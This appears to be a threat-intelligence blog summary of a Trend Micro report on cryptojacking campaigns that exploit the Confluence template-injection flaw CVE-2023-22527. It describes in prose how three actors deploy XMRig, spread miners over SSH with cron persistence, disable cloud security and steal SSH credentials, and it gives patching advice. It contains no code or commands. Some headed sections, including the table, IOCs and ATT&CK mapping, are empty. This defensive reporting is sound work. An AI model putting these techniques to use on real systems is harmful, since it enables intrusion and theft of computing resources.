Cryptojacking Campaign Exploits CVE-2023-22527 in Atlassian Confluence

Introduction

On August 28, 2024, Trend Micro released a report detailing the exploitation of CVE-2023-22527, a critical vulnerability in Atlassian Confluence. This vulnerability, initially disclosed on January 16, 2024, affects the Confluence Data Center and Confluence Server. The report highlights how threat actors are actively exploiting this vulnerability to deploy crypto-mining software across compromised environments, effectively turning them into crypto-mining networks.

Report Overview

The vulnerability, which is present in multiple versions of Confluence Data Center and Server, is primarily exploited through a template injection flaw. Attackers can remotely execute code without authentication, giving them control over the affected systems. The versions impacted by this vulnerability include Confluence Data Center and Server versions 8.0.x through 8.5.3.

Table 1: Affected Confluence Data Center and Server Versions

Three main threat actors have been observed leveraging this vulnerability to deploy crypto mining scripts. These scripts mine cryptocurrency, utilizing the computing resources of the compromised systems.

1. First Threat Actor: This actor utilizes XMRig, a popular crypto mining tool, to execute mining activities through an ELF payload.
2. Second Threat Actor: This actor employs a shell script that is distributed across multiple endpoints via SSH and targets Linux-based systems. The script kills competing crypto mining processes, deletes existing cron jobs, and sets up new cron jobs to maintain persistence.
3. Third Threat Actor: This actor focuses on disabling cloud-based security services and exfiltrating SSH credentials to spread the crypto mining operation further across the network.

The exploitation of CVE-2023-22527 poses significant risks to organizations that rely on Confluence. Once compromised, affected systems become part of a larger crypto mining network, leading to degraded performance, increased energy consumption, and potential exposure to further security breaches. The unauthorized use of computing resources for crypto mining can result in substantial financial losses and operational disruptions.

Insights and Analysis

Cybersecurity experts recommend immediate action to mitigate the risks associated with this vulnerability. Updating to the latest Confluence Data Center and Server versions is the most effective way to prevent exploitation. Additionally, implementing robust security measures, such as network segmentation and regular vulnerability assessments, can help protect against similar attacks in the future.

To safeguard against the ongoing exploitation of CVE-2023-22527, organizations should:

1. Regularly update and patch Confluence instances to the latest available versions.
2. Isolate critical systems from the broader network to limit the spread of potential attacks.
3. Conduct regular security audits and vulnerability assessments to identify and address weaknesses.
4. Develop and maintain an incident response plan to swiftly address any security breaches.

By taking these proactive measures, organizations can significantly reduce their exposure to crypto jacking campaigns and other security threats.

Indicators of Compromise (IOCs)

No specific Indicators of Compromise (IOCs) were provided in the source material.

MITRE ATT&CK Framework Mapping

References

Cryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem

We provide a technical analysis on how CVE-2023-22527 can be exploited by malicious actors for cryptojacking attacks that can spread across the victim’s system.

Trend MicroContact Us